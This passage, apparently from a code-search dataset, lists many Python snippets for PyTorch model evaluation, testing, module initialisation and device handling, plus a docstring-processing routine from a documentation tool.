module_exc_opts != ['']:\n runmods = [x for x in available_mods if x not in gen_runlist(module_exc_opts, available_mods)]\n\n if not multiprocessing:\n for module in runmods:\n modExec(module)\n else:\n runner = pool.map(modExec, runmods)\n\n pool.close()\n pool.join()", "def compile(self):\n for layer in self.layers:\n layer._Dense__load()", "def process_module_list(self, modules):", "def to_train(self):\n for _m in self.modules.values():\n _m.train()", "def test(self, test_loader):\n\n self.model.eval()\n with torch.no_grad():\n return self.tester(test_loader, verbose=False)", "def eval_all(self, plot: bool = True) -> None:\n # evaluate all ports\n for port in self.pm.ports.values():\n for t in [\"base\", \"transfer\"]:\n self.eval_port(port, training_type=t, plot=plot)\n\n if plot:\n self.plot_ports_by_mae(training_type=\"base\")\n 
self.plot_ports_by_mae(training_type=\"transfer\")", "def test_model(net, data_loader):\n net.eval()\n running_loss = 0.0\n with torch.no_grad():\n for data in data_loader:\n X = data['X']\n y_d = data['y_descreen']\n outputs = net(X)\n loss = criterion(outputs, y_d)\n running_loss += loss\n return running_loss", "def evaluate_batch(self, batch: TorchData, model: nn.Module) -> Dict[str, Any]:\n pass", "def test_non_leaf_module_names(self):\n class Net(torch.nn.Module):\n \"\"\"\n Model using multiply as functional and module at different depths\n \"\"\"\n def __init__(self):\n super().__init__()\n self.layer = HierarchicalMultiplyModule()\n\n def forward(self, x):\n return self.layer(x)\n\n model = Net()\n dummy_input = torch.randn(10, 1, 3)\n onnx_path = './data/MyModel.onnx'\n\n torch.onnx.export(model, dummy_input, onnx_path)\n onnx_utils.OnnxSaver.set_node_names(onnx_path, model, dummy_input)\n\n onnx_model = onnx.load(onnx_path)\n onnx.checker.check_model(onnx_model)\n self.check_onnx_node_name_uniqueness(onnx_model)\n\n expected_names = [\n # names compatible with torch 1.9.1 version (should be removed in the future)\n 'layer.mul1.mul',\n 'layer.mul1.Mul_7',\n 'layer.mul2.mul',\n 'layer.mul2.Mul_15',\n 'layer.Mul_18',\n \n # names compatible with torch 1.13.1 version \n '/layer/mul1/Mul',\n '/layer/mul2/Mul',\n '/layer/Mul'\n ]\n for node in onnx_model.graph.node:\n assert 'Constant' in node.name or node.name in expected_names\n\n if os.path.exists(onnx_path):\n os.remove(onnx_path)", "def define_module(self):\n # pylint: disable=invalid-name\n # Small names like fc abd bn are fine in this context.\n\n resnet = resnet152(pretrained=True)\n modules = list(resnet.children())[:-1] # delete the last fc layer.\n for module in modules:\n module.requires_grad = False\n self.resnet = nn.Sequential(*modules)\n self.fc = nn.Linear(resnet.fc.in_features, self.d_embed)\n self.bn = nn.BatchNorm1d(self.d_embed, momentum=0.01)", "def evaluate_basin(\n model: nn.Module, loader: DataLoader, user_cfg: Dict\n) -> Tuple[np.ndarray, np.ndarray]:\n model.eval()\n\n preds, obs = None, None\n with torch.no_grad():\n for data in loader:\n if len(data) == 2:\n x, y = data\n x, y = x.to(user_cfg[\"device\"]), y.to(user_cfg[\"device\"])\n p = model(x)[0]\n elif len(data) == 3:\n x_d, x_s, y = data\n x_d, x_s, y = (\n x_d.to(user_cfg[\"device\"]),\n x_s.to(user_cfg[\"device\"]),\n y.to(user_cfg[\"device\"]),\n )\n p = model(x_d, x_s[:, 0, :])[0]\n\n if preds is None:\n preds = p.detach().cpu()\n obs = y.detach().cpu()\n else:\n preds = torch.cat((preds, p.detach().cpu()), 0)\n obs = torch.cat((obs, y.detach().cpu()), 0)\n\n preds = rescale_features(\n preds.numpy(),\n variable=\"output\",\n scaler_dir=user_cfg[\"train_basin_file\"].parent,\n )\n obs = obs.numpy()\n # set discharges < 0 to zero\n preds[preds < 0] = 0\n\n return preds, obs", "def do_one_mod(self, names: List[str], infer: bool, exec_: bool, conf: dict):\n\n p = lambda: Progress(\n TextColumn(\"[progress.description]{task.description}\", justify=\"right\"),\n BarColumn(bar_width=None),\n \"[progress.percentage]{task.percentage:>3.1f}%\",\n \"[progress.completed]{task.completed} / {task.total}\",\n TimeElapsedColumn(),\n )\n # step one collect all the modules instances we want to analyse.\n\n modules = []\n for name in names:\n x, *r = name.split(\".\")\n n0 = __import__(name)\n for sub in r:\n n0 = getattr(n0, sub)\n modules.append(n0)\n\n # step 2 try to guess the version number from the top module.\n version = getattr(modules[0], \"__version__\", 
\"???\")\n\n root = names[0].split(\".\")[0]\n module_conf = conf.get(root, {})\n examples_folder = module_conf.get(\"examples_folder\", None)\n print(\"EF\", examples_folder)\n if examples_folder is not None:\n examples_folder = Path(examples_folder).expanduser()\n examples_data = self.collect_examples(examples_folder)\n for edoc, figs in examples_data:\n self.examples.update(\n {k: json.dumps(v.to_json()) for k, v in edoc.items()}\n )\n for name, data in figs:\n print(\"put one fig\", name)\n self.put_raw(name, data)\n print(\"Configuration:\", json.dumps(module_conf, indent=2))\n self.root = root\n self.version = version\n subs = module_conf.get(\"submodules\", [])\n extra_from_conf = [root + \".\" + s for s in subs]\n for name in extra_from_conf:\n x, *r = name.split(\".\")\n n0 = __import__(name)\n for sub in r:\n n0 = getattr(n0, sub)\n modules.append(n0)\n\n # print(modules)\n\n collector = DFSCollector(modules[0], modules[1:])\n collected: Dict[str, Any] = collector.items()\n\n # collect all items we want to document.\n for qa, item in collected.items():\n if (nqa := full_qual(item)) != qa:\n print(\"after import qa differs : {qa} -> {nqa}\")\n if collected[nqa] == item:\n print(\"present twice\")\n del collected[nqa]\n else:\n print(\"differs: {item} != {other}\")\n\n for target in module_conf.get(\"exclude\", []):\n print(\"exclude tgt:\", target)\n del collected[target]\n # p = nullcontext\n with p() as p2:\n\n # just nice display of progression.\n taskp = p2.add_task(description=\"parsing\", total=len(collected))\n\n for qa, target_item in collected.items():\n short_description = (qa[:19] + \"..\") if len(qa) > 21 else qa\n p2.update(taskp, description=short_description.ljust(17))\n p2.advance(taskp)\n item_docstring = target_item.__doc__\n\n # TODO: we may not want tosip items as they may have children\n # right now keep modules, but we may want to keep classes if\n # they have documented descendants.\n\n if item_docstring is None and not isinstance(target_item, ModuleType):\n continue\n elif item_docstring is None and isinstance(target_item, ModuleType):\n item_docstring = \"\"\"This module has no documentation\"\"\"\n\n # progress.console.print(qa)\n try:\n if tsparse is None:\n print(\n \"please see how to install Tree-sitter in the readme to parse complex RST documents\"\n )\n arbitrary = tsparse(dedent_but_first(item_docstring).encode())\n except Exception as e:\n print(f\"TS could not parse: {qa}\")\n raise ValueError(f\"from {qa}\") from e\n arbitrary = []\n # raise\n try:\n ndoc = NumpyDocString(dedent_but_first(item_docstring))\n except Exception:\n if not isinstance(target_item, ModuleType):\n p2.console.print(\n \"Unexpected error parsing\",\n target_item,\n target_item.__name__,\n )\n if isinstance(target_item, ModuleType):\n # from .take2 import main\n # main(item_docstring)\n ndoc = NumpyDocString(\n f\"Was not able to parse docstring for {qa}\"\n )\n else:\n continue\n if not isinstance(target_item, ModuleType):\n arbitrary = []\n execute_exclude_patterns = module_conf.get(\n \"execute_exclude_patterns\", None\n )\n ex = exec_\n if execute_exclude_patterns and exec_:\n for pat in execute_exclude_patterns:\n if qa.startswith(pat):\n ex = False\n break\n # else:\n # print(\"will run\", qa)\n\n try:\n doc_blob, figs = self.do_one_item(\n target_item, ndoc, infer, ex, qa, config=module_conf\n )\n doc_blob.arbitrary = arbitrary\n except Exception:\n raise\n if module_conf.get(\"exec_failure\", None) == \"fallback\":\n print(\"Re-analysing \", qa, \"without 
execution\")\n # debug:\n doc_blob, figs = self.do_one_item(\n target_item, ndoc, infer, False, qa, config=module_conf\n )\n doc_blob.aliases = collector.aliases[qa]\n\n # processing....\n doc_blob.signature = doc_blob.content.pop(\"Signature\")\n try:\n for section in [\"Extended Summary\", \"Summary\", \"Notes\", \"Warnings\"]:\n if section in doc_blob.content:\n if data := doc_blob.content[section]:\n PX = P2(data)\n doc_blob.content[section] = Section(PX)\n else:\n doc_blob.content[section] = Section()\n except Exception as e:\n raise type(e)(f\"during {qa}\")\n\n doc_blob.references = doc_blob.content.pop(\"References\")\n if isinstance(doc_blob.references, str):\n if doc_blob.references == \"\":\n doc_blob.references = None\n else:\n assert False\n doc_blob.references = list(doc_blob.references)\n assert (\n isinstance(doc_blob.references, list) or doc_blob.references is None\n )\n del doc_blob.content[\"Examples\"]\n del doc_blob.content[\"index\"]\n sections_ = [\n \"Parameters\",\n \"Returns\",\n \"Raises\",\n \"Yields\",\n \"Attributes\",\n \"Other Parameters\",\n \"Warns\",\n ##\"Warnings\",\n \"Methods\",\n # \"Summary\",\n \"Receives\",\n ]\n from .take2 import Param\n\n # new_doc_blob._content[\"Parameters\"] = [\n # Parameter(a, b, c)\n # for (a, b, c) in new_doc_blob._content.get(\"Parameters\", [])\n # ]\n\n for s in sections_:\n if s in doc_blob.content:\n assert isinstance(\n doc_blob.content[s], list\n ), f\"{s}, {doc_blob.content[s]} \"\n new_content = Section()\n for param, type_, desc in doc_blob.content[s]:\n assert isinstance(desc, list)\n items = []\n if desc:\n items = P2(desc)\n new_content.append(Param(param, type_, items))\n doc_blob.content[s] = new_content\n\n doc_blob.see_also = []\n if see_also := doc_blob.content.get(\"See Also\", None):\n for nts, d0 in see_also:\n try:\n d = d0\n for (name, type_or_description) in nts:\n if type_or_description and not d:\n desc = type_or_description\n if isinstance(desc, str):\n desc = [desc]\n assert isinstance(desc, list)\n desc = paragraphs(desc)\n type_ = None\n else:\n desc = d0\n type_ = type_or_description\n assert isinstance(desc, list)\n desc = paragraphs(desc)\n\n sai = SeeAlsoItem(Ref(name, None, None), desc, type_)\n doc_blob.see_also.append(sai)\n del desc\n del type_\n except Exception as e:\n raise ValueError(\n f\"Error {qa}: {see_also=} | {nts=} | {d0=}\"\n ) from e\n del doc_blob.content[\"See Also\"]\n\n for k, v in doc_blob.content.items():\n assert isinstance(v, Section), f\"{k} is not a section {v}\"\n # end processing\n\n self.put(qa, json.dumps(doc_blob.to_json(), indent=2))\n for name, data in figs:\n self.put_raw(name, data)\n\n found = {}\n not_found = []\n for k, v in collector.aliases.items():\n if [item for item in v if item != k]:\n if shorter := find_cannonical(k, v):\n found[k] = shorter\n else:\n not_found.append((k, v))\n\n if logo := module_conf.get(\"logo\", None):\n self.put_raw(\"logo.png\", Path(logo).read_bytes())\n self.metadata = {\n \"version\": version,\n \"logo\": \"logo.png\",\n \"aliases\": found,\n \"module\": root,\n }", "def test():\n return _make_modules(is_train=False)", "def may_transfer_modules_optims(modules_and_or_optims, device_id=-1):\n for item in modules_and_or_optims:\n if isinstance(item, torch.optim.Optimizer):\n transfer_optim_state(item.state, device_id=device_id)\n elif isinstance(item, torch.nn.Module):\n if device_id == -1:\n item.cpu()\n else:\n item.cuda(device=device_id)\n elif item is not None:\n print('[Warning] Invalid type 
{}'.format(item.__class__.__name__))", "def may_transfer_modules_optims(modules_and_or_optims, device_id=-1):\n for item in modules_and_or_optims:\n if isinstance(item, torch.optim.Optimizer):\n transfer_optim_state(item.state, device_id=device_id)\n elif isinstance(item, torch.nn.Module):\n if device_id == -1:\n item.cpu()\n else:\n item.cuda(device_id=device_id)\n elif item is not None:\n print '[Warning] Invalid type {}'.format(item.__class__.__name__)", "def evaluate():\n model.eval()\n with torch.no_grad():\n loss, n = 0, 0\n for xb, yb in valid_dl:\n n += len(xb)\n loss += loss_func(model(xb), yb) * len(xb)\n\n return loss/n", "def evaluate(val_loader, model, epoch, cfg):\n if distributed.is_master_proc():\n print('-' * 89)\n print('Evaluation on val set epoch {:5d}'.format(epoch))\n print('-' * 89)\n \n # Enable eval mode.\n model.eval()\n sigmoid = nn.Sigmoid()\n\n # Use cuda if available\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\n instances_iou = []\n pbar = tqdm(total=len(val_loader))\n for (batch_idx, (caption, boxes, instances, mask_features, annotations, ann_types, ann_categories, noun_phrases, grounding_instances, image_info)) in enumerate(val_loader):\n boxes = boxes.to(device)\n instances = instances.to(device)\n mask_features = mask_features.to(device)\n annotations = annotations.to(device)\n ann_types = ann_types.to(device)\n ann_categories = ann_categories.to(device)\n noun_phrases = noun_phrases.to(device)\n grounding_instances = grounding_instances.to(device)\n height = image_info['height'].to(device)\n width = image_info['width'].to(device)\n \n # Perform the forward pass\n scores = model(caption, boxes, mask_features, noun_phrases)\n\n if cfg.NUM_GPUS > 1:\n scores, grounding_instances, annotations, instances = distributed.all_gather(\n [scores, grounding_instances, annotations, instances]\n )\n height, width = distributed.all_gather(\n [height, width]\n )\n\n # Evaluation\n words_mask = ann_types == 1\n\n scores = torch.bmm(noun_phrases.transpose(1, 2), scores)\n scores = scores / (noun_phrases.sum(dim=1).unsqueeze(dim=2).repeat(1, 1, scores.shape[2]) + 0.0000001)\n \n scores = sigmoid(scores)\n index = torch.argmax(scores, dim=2).cpu().numpy()\n predictions = instances[torch.arange(instances.shape[0]).unsqueeze(-1), index]\n predictions = predictions[words_mask]\n targets = grounding_instances[words_mask]\n words_index = words_mask.nonzero()\n\n if len(predictions.shape) < 3:\n predictions = predictions.unsqueeze(0)\n targets = targets.unsqueeze(0)\n words_index = words_index.unsqueeze(0)\n\n plurals_mask = ann_types == 2\n for p in plurals_mask.nonzero():\n plural_instance = torch.zeros([predictions.shape[1], predictions.shape[2]]).to(device)\n if not cfg.TEST.ORACLE:\n plural_instances = (scores[p[0], p[1], :] > 0.1).nonzero()\n plural_instances = plural_instances.squeeze() if len(plural_instances.shape) > 1 else plural_instances\n else:\n plural_instances = annotations[p[0], p[1]].nonzero().squeeze()\n if plural_instances.nelement() > 0:\n plural_instance = instances[p[0], plural_instances]\n if len(plural_instance.shape) == 3:\n plural_instance, _ = plural_instance.max(dim=0)\n predictions = torch.cat([predictions, plural_instance.unsqueeze(0)])\n targets = torch.cat([targets, grounding_instances[p[0], p[1]].unsqueeze(0)])\n words_index = torch.cat([words_index, p.unsqueeze(0)])\n\n for p, t, (i, _) in zip(predictions, targets, words_index):\n mask_transform = Resize((int(height[i].cpu().item()), int(width[i].cpu().item())))\n p 
= mask_transform(p.unsqueeze(dim=0)).squeeze()\n t = mask_transform(t.unsqueeze(dim=0)).squeeze()\n _, _, instance_iou = compute_mask_IoU(p, t)\n instances_iou.append(instance_iou.cpu().item())\n\n if distributed.is_master_proc():\n pbar.update(1)\n if batch_idx % cfg.LOG_PERIOD == 0:\n tqdm.write('acc@0.5: {:.5f} | AA: {:.5f}'.format(accuracy_score(np.ones([len(instances_iou)]), np.array(instances_iou) > 0.5), average_accuracy(instances_iou))) \n\n pbar.close()\n\n # Final evaluation metrics\n AA = average_accuracy(instances_iou)\n accuracy = accuracy_score(np.ones([len(instances_iou)]), np.array(instances_iou) > 0.5)\n if distributed.is_master_proc():\n print('| epoch {:5d} | final acc@0.5: {:.5f} | final AA: {:.5f} |'.format(\n epoch,\n accuracy,\n AA))\n return AA", "def initialize_training_false_recursive(module: Module) -> Module:\n if isinstance(module, (BatchNorm1d, BatchNorm2d, BatchNorm3d)):\n initialize_batch_norm_eval(module)\n else:\n for module_child in module.children():\n initialize_training_false_recursive(module_child)\n return module.train(False)", "def set_models_eval(self):\n raise NotImplementedError", "def run_evaluation(net, loader):\n net.net.eval()\n losses_eval = {}\n for i, batch in enumerate(loader):\n with torch.no_grad():\n losses_batch = net.compute_loss(*batch, eval=True)\n append_losses(losses_eval, losses_batch)\n net.net.train()\n return losses_eval", "def initialize(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d) or isinstance(m, nn.Linear):\n nn.init.xavier_normal_(m.weight)\n if m.bias is not None:\n nn.init.constant_(m.bias, 0)\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)", "def _set_eval(self):\n\n if self.model.__dict__['training']:\n self.model.eval()", "def eval(self, test_loader):\n\n self.generator.eval()\n self.discriminator.eval()\n\n # Total correct prediction counts.\n correct = inpainted_correct = real_correct = 0\n\n m1, m2 = masks(test_loader)\n with torch.no_grad():\n for real_images, _ in test_loader:\n real_images = real_images.to('cuda')\n batch_size = real_images.size()[0]\n\n # Correct prediction counts in the batch.\n batch_inpainted_correct = batch_real_correct = 0\n\n # Generate inpainted images.\n inpainted_images = self.generator(real_images*m1 - m2)\n\n # Get predictions on real images.\n real_logits = self.discriminator(real_images)\n real_predictions = torch.sigmoid(real_logits).round()\n\n # Get target labels for real images.\n real_target = torch.ones(batch_size, device='cuda')\n real_target = real_target.view_as(real_predictions)\n\n # Check number of correct predictions on real images.\n batch_real_correct = (\n real_predictions.eq(real_target).sum()\n )\n real_correct += batch_real_correct.item()\n\n # Get predictions on inpainted images.\n inpainted_logits = self.discriminator(inpainted_images)\n inpainted_predictions = (\n torch.sigmoid(inpainted_logits).round()\n )\n\n # Get target labels for inpainted images.\n inpainted_target = (\n torch.zeros(batch_size, device='cuda')\n )\n inpainted_target = (\n inpainted_target.view_as(inpainted_predictions)\n )\n\n # Check number of correct predictions on inpainted.\n batch_inpainted_correct = (\n inpainted_predictions.eq(inpainted_target).sum()\n )\n inpainted_correct += batch_inpainted_correct.item()\n\n # Get total number of correct predictions.\n correct += real_correct + inpainted_correct\n\n # Log results.\n msg = (\n '\\nTest set: Accuracy: {}/{} ({:.0f}%)'\n '\\tInpainted correct: {}\\tReal 
correct: {}\\n'\n )\n msg = msg.format(\n correct,\n 2*len(test_loader.dataset),\n 100. * correct / (2*len(test_loader.dataset)),\n inpainted_correct,\n real_correct\n )\n logger.info(msg)\n\n # Save some inpainted images.\n real_images, _ = next(iter(test_loader))\n real_images = real_images.to('cuda')\n filename = os.path.join(\n self.args.output_dir,\n 'images',\n f'epoch_{self.epochs}_original.jpg'\n )\n save_image(\n tensor=real_images,\n filename=filename,\n normalize=True,\n scale_each=True,\n nrow=10\n )\n\n masked_images = m1*real_images - m2\n filename = os.path.join(\n self.args.output_dir,\n 'images',\n f'epoch_{self.epochs}_masked.jpg'\n )\n save_image(\n tensor=masked_images,\n filename=filename,\n normalize=True,\n scale_each=True,\n nrow=10\n )\n\n inpainted_images = self.generator(masked_images)\n filename = os.path.join(\n self.args.output_dir,\n 'images',\n f'epoch_{self.epochs}_inpainted.jpg'\n )\n save_image(\n tensor=inpainted_images,\n filename=filename,\n normalize=True,\n scale_each=True,\n nrow=10\n )", "def test(self):\n with torch.no_grad():\n self.model.eval()\n p10_forecast, p10_forecast, p90_forecast, target = None, None, None, None\n\n t = time()\n for step, sample in enumerate(self.test_loader):\n\n # Hide future predictions from input vector, set to 0 (or 1) values where timestep > encoder_steps\n steps = self.cnf.all_params['num_encoder_steps']\n pred_len = sample['outputs'].shape[1]\n x = sample['inputs'].float().to(self.cnf.device)\n x[:, steps:, 0] = 1\n\n # Feed input to the model\n if self.cnf.all_params[\"model\"] == \"transformer\" or self.cnf.all_params[\"model\"] == \"grn_transformer\":\n\n # Auto-regressive prediction\n for i in range(pred_len):\n output = self.model.forward(x)\n x[:, steps + i, 0] = output[:, i, 1]\n output = self.model.forward(x)\n\n elif self.cnf.all_params[\"model\"] == \"tf_transformer\":\n output, _, _ = self.model.forward(x)\n else:\n raise NameError\n\n output = output.squeeze()\n y, y_pred = sample['outputs'].squeeze().float().to(self.cnf.device), output\n\n # Compute loss\n loss, _ = self.loss(y_pred, y)\n smape = symmetric_mean_absolute_percentage_error(output[:, :, 1].detach().cpu().numpy(),\n sample['outputs'][:, :, 0].detach().cpu().numpy())\n\n # De-Normalize to compute metrics\n target = unnormalize_tensor(self.data_formatter, y, sample['identifier'][0][0])\n p10_forecast = unnormalize_tensor(self.data_formatter, y_pred[..., 0], sample['identifier'][0][0])\n p50_forecast = unnormalize_tensor(self.data_formatter, y_pred[..., 1], sample['identifier'][0][0])\n p90_forecast = unnormalize_tensor(self.data_formatter, y_pred[..., 2], sample['identifier'][0][0])\n\n # Compute metrics\n self.test_losses['p10'].append(self.loss.numpy_normalised_quantile_loss(p10_forecast, target, 0.1))\n self.test_losses['p50'].append(self.loss.numpy_normalised_quantile_loss(p50_forecast, target, 0.5))\n self.test_losses['p90'].append(self.loss.numpy_normalised_quantile_loss(p90_forecast, target, 0.9))\n\n self.test_loss.append(loss.item())\n self.test_smape.append(smape)\n\n # Plot serie prediction\n p1, p2, p3, target = np.expand_dims(p10_forecast, axis=-1), np.expand_dims(p50_forecast, axis=-1), \\\n np.expand_dims(p90_forecast, axis=-1), np.expand_dims(target, axis=-1)\n p = np.concatenate((p1, p2, p3), axis=-1)\n plot_temporal_serie(p, target)\n\n # Log stuff\n for k in self.test_losses.keys():\n mean_test_loss = np.mean(self.test_losses[k])\n print(f'\\t● AVG {k} Loss on TEST-set: {mean_test_loss:.6f} │ T: {time() - t:.2f} s')\n\n # 
log log log\n mean_test_loss = np.mean(self.test_loss)\n mean_smape = np.mean(self.test_smape)\n print(f'\\t● AVG Loss on TEST-set: {mean_test_loss:.6f} │ T: {time() - t:.2f} s')\n print(f'\\t● AVG SMAPE on TEST-set: {mean_smape:.6f} │ T: {time() - t:.2f} s')", "def test_image():\n def get_images_name(folder):\n \"\"\"Create a generator to list images name at evaluation time\"\"\"\n onlyfiles = [f for f in os.listdir(folder) if os.path.isfile(os.path.join(folder, f))]\n for f in onlyfiles:\n yield f\n\n def pil_loader(path):\n \"\"\"Load images from /eval/ subfolder, convert to greyscale and resized it as squared\"\"\"\n with open(path, 'rb') as f:\n with Image.open(f) as img:\n sqrWidth = np.ceil(np.sqrt(img.size[0]*img.size[1])).astype(int)\n return img.convert('L').resize((sqrWidth, sqrWidth))\n\n eval_loader = torch.utils.data.DataLoader(ImageFolder(root=args.evalf, transform=transforms.Compose([\n transforms.Resize(28),\n transforms.CenterCrop(28),\n transforms.ToTensor(),\n transforms.Normalize((0.1307,), (0.3081,))\n ]), loader=pil_loader), batch_size=1, **kwargs)\n\n # Name generator\n names = get_images_name(os.path.join(args.evalf, \"images\"))\n model.eval()\n with torch.no_grad():\n for data, target in eval_loader:\n data, target = data.to(device), target.to(device)\n output = model(data)\n label = output.argmax(dim=1, keepdim=True).item()\n print (\"Images: \" + next(names) + \", Classified as: \" + str(label))", "def test(model, data_loader, num_train_batches, epoch, test_mloss, test_rloss, test_acc, directory):\r\n print('===> Evaluate mode')\r\n\r\n # Switch to evaluate mode\r\n model.eval()\r\n\r\n if args.cuda:\r\n # When we wrap a Module in DataParallel for multi-GPUs\r\n model = model.module\r\n\r\n loss = 0\r\n margin_loss = 0\r\n recon_loss = 0\r\n\r\n correct = 0\r\n\r\n num_batches = len(data_loader)\r\n\r\n global_step = epoch * num_train_batches + num_train_batches\r\n\r\n start_time = timer()\r\n\r\n for data, target in data_loader:\r\n with torch.no_grad():\r\n batch_size = data.size(0)\r\n target_indices = target\r\n target_one_hot = utils.one_hot_encode(target_indices, length=args.num_classes)\r\n assert target_one_hot.size() == torch.Size([batch_size, 10])\r\n\r\n target = target_one_hot\r\n\r\n if args.cuda:\r\n data = data.to(args.device)\r\n target = target.to(args.device)\r\n target_indices.to(args.device)\r\n\r\n # Output predictions\r\n output, reconstruction = model(data, target_indices, False) # output from DigitCaps (out_digit_caps)\r\n\r\n # Sum up batch loss\r\n t_loss, m_loss, r_loss = loss_func(\r\n output, target, args.regularization_scale, reconstruction, data, args.device, batch_size)\r\n loss += t_loss.data\r\n margin_loss += m_loss.data\r\n recon_loss += r_loss.data\r\n\r\n # Count number of correct predictions\r\n # v_magnitude shape: [128, 10, 1, 1]\r\n v_magnitude = torch.sqrt((output**2).sum(dim=2, keepdim=True))\r\n # pred shape: [128, 1, 1, 1]\r\n pred = v_magnitude.data.max(1, keepdim=True)[1].cpu()\r\n correct += pred.eq(target_indices.view_as(pred)).sum()\r\n\r\n\r\n # Get the reconstructed images of the last batch\r\n if args.use_reconstruction_loss:\r\n reconstruction = model.decoder(output, target_indices, False)\r\n # Input image size and number of channel.\r\n # By default, for MNIST, the image width and height is 28x28 and 1 channel for black/white.\r\n image_width = args.input_width\r\n image_height = args.input_height\r\n image_channel = args.num_conv_in_channels\r\n recon_img = reconstruction.view(-1, image_channel, 
image_width, image_height)\r\n assert recon_img.size() == torch.Size([batch_size, image_channel, image_width, image_height])\r\n\r\n # Save the image into file system\r\n utils.save_image(recon_img, directory / ('recons_image_test_{}_{}.png'.format(epoch, global_step)))\r\n utils.save_image(data, directory /\r\n ('original_image_test_{}_{}.png'.format(epoch, global_step)))\r\n\r\n end_time = timer()\r\n\r\n # Log test losses\r\n loss /= num_batches\r\n margin_loss /= num_batches\r\n recon_loss /= num_batches\r\n\r\n # Log test accuracies\r\n num_test_data = len(data_loader.dataset)\r\n accuracy = correct / num_test_data\r\n accuracy_percentage = float(correct) * 100.0 / float(num_test_data)\r\n\r\n test_mloss.write('%.6f \\n' % margin_loss)\r\n test_rloss.write('%.6f \\n' % recon_loss)\r\n test_acc.write('%.4f \\n' % accuracy_percentage)\r\n\r\n # Print test losses and accuracy\r\n print('Test: [Loss: {:.6f},' \\\r\n '\\tMargin loss: {:.6f},' \\\r\n '\\tReconstruction loss: {:.6f}]'.format(\r\n loss,\r\n margin_loss,\r\n recon_loss if args.use_reconstruction_loss else 0))\r\n print('Test Accuracy: {}/{} ({:.2f}%)\\n'.format(\r\n correct, num_test_data, accuracy_percentage))\r\n\r\n\r\n global avg_testing_time_per_epoch\r\n avg_testing_time_per_epoch = (\r\n avg_testing_time_per_epoch * (epoch - 1) + end_time - start_time) / epoch\r\n\r\n global best_acc\r\n global best_acc_epoch\r\n if accuracy_percentage > best_acc:\r\n best_acc = accuracy_percentage\r\n best_acc_epoch = epoch\r\n test_loader = data_loader\r\n utils.dump(utils.make_full_checkpoint_obj(locals(), globals()), directory / 'trained_model/FP32_model')", "def eval(self):\n self.train(mode=False)", "def edit_model(m: T_Module, f: Callable[[nn.Module], nn.Module]) -> nn.Module:\n for name, mod in m._modules.items():\n m._modules[name] = edit_model(mod, f)\n m._modules[name] = f(mod)\n return f(m)", "def _evaluate(model):\n _recompile(model)\n if isinstance(eval_dataset, tuple):\n eval_images, eval_labels = eval_dataset\n return model.evaluate(\n eval_images, eval_labels, verbose=verbose, return_dict=True)\n else:\n return model.evaluate(eval_dataset, verbose=verbose, return_dict=True)", "def eval(self):\n # self.recognizer.eval()\n self.detector.eval()\n self.shared_conv.eval()", "def train(self, mode=True):\n super(RCRNN, self).train(mode)\n if self.freeze_bn:\n print(\"Freezing Mean/Var of BatchNorm2D.\")\n if self.freeze_bn:\n print(\"Freezing Weight/Bias of BatchNorm2D.\")\n if self.freeze_bn:\n for m in self.modules():\n if isinstance(m, nn.BatchNorm2d):\n m.eval()\n if self.freeze_bn:\n m.weight.requires_grad = False\n m.bias.requires_grad = False", "def forward(self, images):\n # pylint: disable=arguments-differ\n # The arguments will differ from the base class since nn.Module is an abstract class.\n\n with torch.no_grad():\n latent = self.resnet(images).squeeze()\n features = self.bn(self.fc(latent))\n return features", "def compute(self) -> None:\n \n self.model.eval()\n \n with torch.no_grad():\n for (input, target, _) in self.loader:\n\n # self.model = self.model.train(False) # TEST @lacoupe\n output, _ = self.model(input)\n \n output = (output >= 0.5)\n \n for out, tar in zip(output, target):\n \n tar = bool(tar)\n \n if out and tar:\n self.confusion['true_positive'] += 1\n elif not out and not tar:\n self.confusion['true_negative'] += 1\n elif out and not tar:\n self.confusion['false_positive'] += 1\n elif not out and tar:\n self.confusion['false_negative'] += 1\n \n self.accuracy = (self.confusion['true_positive'] + 
self.confusion['true_negative']) \\\n / sum(list(self.confusion.values()))\n \n if (self.confusion['true_positive'] + self.confusion['false_positive']) == 0.:\n self.precision = 0.\n else:\n self.precision = self.confusion['true_positive'] \\\n / (self.confusion['true_positive'] + self.confusion['false_positive'])\n \n if (self.confusion['true_positive'] + self.confusion['false_negative']) == 0.:\n self.recall = 0.\n else:\n self.recall = self.confusion['true_positive'] \\\n / (self.confusion['true_positive'] + self.confusion['false_negative'])\n \n if (self.precision + self.recall) == 0.:\n self.f1_score = 0.\n else:\n self.f1_score = 2 * self.precision * self.recall / (self.precision + self.recall)", "def evaluate_model(self):\r\n self.model.eval() # sets layers to eval mode (e.g. norm, dropout)\r\n with torch.no_grad(): # deactivates autograd engine\r\n\r\n # generate graphs required for model evaluation\r\n # note that evaluation of the generated graphs happens in\r\n # `generate_graphs()`, and molecules are saved as `self` attributes\r\n self.generate_graphs(n_samples=self.C.n_samples, evaluation=True)\r\n\r\n print(\"* Evaluating model.\", flush=True)\r\n anal.evaluate_model(valid_dataloader=self.valid_dataloader,\r\n train_dataloader=self.train_dataloader,\r\n nll_per_action=self.nll_per_action,\r\n model=self.model)\r\n\r\n self.nll_per_action = None # don't need anymore\r\n\r\n print(f\"* Saving model state at Epoch {self.current_epoch}.\", flush=True)\r\n\r\n # `pickle.HIGHEST_PROTOCOL` good for large objects\r\n model_path_and_filename = (self.C.job_dir + f\"model_restart_{self.current_epoch}.pth\")\r\n torch.save(obj=self.model,\r\n f=model_path_and_filename,\r\n pickle_protocol=pickle.HIGHEST_PROTOCOL)", "def cuda(self):\n for i in self.modules:\n if torch.cuda.is_available():\n self.modules[i] = self.modules[i].cuda()", "def find_best_module_for_attributions(model, module):\n modules = list(model.modules())\n try:\n current_idx = modules.index(module)\n eval_module = module\n for next_module in modules[current_idx+1:]:\n if isinstance(next_module, _BatchNorm):\n print(f\"BatchNorm detected: shifting evaluation after {next_module}\")\n eval_module = next_module\n elif any([isinstance(next_module, t) for t in ACTIVATIONS]):\n print(f\"Activation detected: shifting evaluation after {next_module}\")\n eval_module = next_module\n else:\n return eval_module\n except ValueError:\n logging.error(\"Provided module is not in model\")\n return module", "def _init_modules(self, pretrained_weights=None):\n if pretrained_weights is None:\n if cfg.MODEL.LOAD_PRETRAINED_BACKBONE_WEIGHTS:\n print(\"\\n-------------------------------------------\")\n print(\"Load pre-trained ImageNet weights\")\n print(\"\\n-------------------------------------------\")\n weight_utils.load_caffe2_pretrained_weights(self, 